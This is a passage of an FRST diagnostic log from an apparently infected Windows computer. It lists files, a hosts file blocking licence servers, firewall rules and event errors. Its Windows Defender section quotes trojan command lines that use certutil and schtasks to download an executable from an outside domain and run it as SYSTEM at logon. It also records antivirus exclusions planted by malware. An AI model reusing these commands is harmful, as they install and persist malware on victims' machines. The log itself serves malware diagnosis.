C:\Windows\System32\ctspkhlp.DLL 2017-08-26 16:54 - 2017-08-26 16:54 - 000410112 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll 2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll 2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL 2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll 2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll 2019-11-24 19:12 - 2016-04-17 19:16 - 000221184 _____ (Mitrich Software) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\idp.dll 2015-04-17 17:30 - 2015-04-17 17:30 - 000139264 _____ (Packetizer, Inc.) [File not signed] C:\Program Files\AESCrypt\AESCrypt.dll 2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll 2019-11-24 19:12 - 2017-05-03 11:31 - 000043520 _____ (Vincenzo Giordano) [File not signed] C:\Users\SR\AppData\Local\Temp\is-94DQB.tmp\psvince.dll ==================== Alternate Data Streams (Whitelisted) ======== (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:907E90B1 [246] AlternateDataStreams: C:\Users\SR\AppData\Local\OPTvJO7k:lSGoicsydMwI75AardtQAZCSFhB [2296] ==================== Safe Mode (Whitelisted) ================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Association (Whitelisted) ================= ==================== Internet Explorer trusted/restricted ========== ==================== Hosts content: ========================= (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts 127.0.0.1 precisionmanuals.com 127.0.0.1 www.precisionmanuals.com 127.0.0.1 license.precisionmanuals.com 127.0.0.1 auth.cycling74.com 127.0.0.1 auth64.cycling74.com 127.0.0.1 www.techsmith.com 127.0.0.1 activation.cloud.techsmith.com 127.0.0.1 oscount.techsmith.com 127.0.0.1 updater.techsmith.com 127.0.0.1 camtasiatudi.techsmith.com 127.0.0.1 tsccloud.cloudapp.net 127.0.0.1 assets.cloud.techsmith.com 127.0.0.1 65.52.240.48 127.0.0.1 oscount.techsmith.com 127.0.0.1 69.167.144.18 127.0.0.1 www.techsmith.com 127.0.0.1 activation.cloud.techsmith.com 127.0.0.1 oscount.techsmith.com 127.0.0.1 updater.techsmith.com 127.0.0.1 camtasiatudi.techsmith.com 127.0.0.1 tsccloud.cloudapp.net 127.0.0.1 assets.cloud.techsmith.com ==================== Other Areas =========================== (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\ HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg DNS Servers: 1.1.1.1 - 1.0.0.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (If an entry is included in the fixlist, it will be removed.) HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run: => "Greenshot" HKLM\...\StartupApproved\Run: => "iTunesHelper" HKLM\...\StartupApproved\Run32: => "StartCCC" HKLM\...\StartupApproved\Run32: => "AsioThk32Reg" HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive" HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam" HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber" ==================== FirewallRules (Whitelisted) ================ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.) FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.) FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.) FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.) FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.) FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed] FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed] FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318 FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed] FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed] FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH) FirewallRules: [TCP Query User{EEA7C7A7-33BA-41A2-BE41-1A26259EAD15}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File FirewallRules: [UDP Query User{4841B43C-6AEF-4BA9-8382-61909EEA1DE3}D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe] => (Allow) D:\program files (x86)\embarcadero\studio\19.0\bin\bds.exe No File FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.) FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed] FirewallRules: [{EDEA1E3E-A12C-4F24-AFFD-F819C6FC187E}] => (Allow) C:\WINDOWS\rss\csrss.exe () [File not signed] FirewallRules: [{CB2B1E04-1443-4466-A2D4-6FECE639BD29}] => (Allow) C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed] ==================== Restore Points ========================= 19-11-2019 13:12:33 Scheduled Checkpoint ==================== Faulty Device Manager Devices ============ ==================== Event log errors: ======================== Application errors: ================== Error: (11/24/2019 07:35:57 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:12:42 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:12:09 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:07:44 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:07:12 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:01:40 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 07:01:07 PM) (Source: SideBySide) (EventID: 78) (User: ) Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line . A component version required by the application conflicts with another component version already active. Conflicting components are:. Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest. Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest. Error: (11/24/2019 06:57:31 PM) (Source: MsiInstaller) (EventID: 10005) (User: DESKTOP-A0OS1Q6) Description: Product: Online Application -- Error 4106. An error was encountered while creating a scheduled task: 'Online Application V2G1.job'. Error description: The parameter is incorrect. System errors: ============= Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscDataProtection and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (11/24/2019 07:14:08 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID Windows.SecurityCenter.WscBrokerManager and APPID Unavailable to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Malwarebytes Service service failed to start due to the following error: Access is denied. Error: (11/24/2019 07:12:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Malwarebytes Service service failed to start due to the following error: Access is denied. Error: (11/24/2019 07:12:07 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} and APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool. Error: (11/24/2019 07:11:28 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6) Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout. Windows Defender: =================================== Date: 2019-11-24 19:12:13.754 Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: Unknown Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0 Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-24 19:12:11.511 Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan Path: CmdLine:_C:\Windows\System32\certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: Unknown Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0 Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-24 19:07:55.432 Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bomitag.D!ml&threatid=2147741007&enterprise=0 Name: Trojan:Win32/Bomitag.D!ml ID: 2147741007 Severity: Severe Category: Trojan Path: file:_C:\Program Files (x86)\Hadadn\68060836.exe; regkey:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z; runonce:_HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\\wh1p1sx0i5z Detection Origin: Local machine Detection Type: FastPath Detection Source: System Process Name: Unknown Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0 Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-24 19:07:39.663 Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Ceprolad.A&threatid=2147726914&enterprise=0 Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan Path: CmdLine:_C:\Windows\System32\schtasks.exe /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR cmd.exe /C certutil.exe -urlcache -split -f http://tfortytimes.com/app/app.exe C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\SR\AppData\Local\Temp\csrss\scheduled.exe /31340 /TN ScheduledUpdate /F Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: Unknown Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0 Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1 Date: 2019-11-24 19:07:39.626 Description: Windows Defender Antivirus has detected malware or other potentially unwanted software. For more information please see the following: https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Neobar&threatid=225451&enterprise=0 Name: BrowserModifier:Win32/Neobar ID: 225451 Severity: High Category: Browser Modifier Path: regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\csrss; regkeyvalue:_HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\SR\AppData\Local\Temp\wup; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{291DB7AE-2C1B-4863-B103-F71CA48986BA}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckIE; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckU; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program Files (x86)\YubeAlckUn; regkeyvalue:_HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\\C:\Program File Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: Unknown Signature Version: AV: 1.305.2712.0, AS: 1.305.2712.0, NIS: 1.305.2712.0 Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1 CodeIntegrity: =================================== Date: 2019-10-29 09:57:25.835 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-08-03 12:16:27.456 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-07-08 12:00:17.288 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-05-04 12:47:46.475 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-03-15 11:40:11.320 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2019-01-26 12:31:13.039 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== BIOS: American Megatrends Inc. F9 10/23/2013 Motherboard: Gigabyte Technology Co., Ltd. B75-D3V Processor: Intel(R) Core(TM) i7-3770 CPU @ 3.40GHz Percentage of memory in use: 26% Total physical RAM: 16331.55 MB Available physical RAM: 12012.87 MB Total Virtual: 16631.55 MB Available Virtual: 10766.25 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:231.78 GB) (Free:62.77 GB) NTFS Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:152.18 GB) NTFS Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:203.93 GB) NTFS Drive h: (Seagate Expansion Drive) (Fixed) (Total:1863.01 GB) (Free:921.95 GB) NTFS Drive p: () (Fixed) (Total:5 GB) (Free:0.35 GB) exFAT \\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB) \\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB) \\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partition Table ==================== ========================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9) Partition: GPT. ========================================================== Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ========================================================== Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ========================================================== Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB) Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS) ==================== End of Addition.txt =======================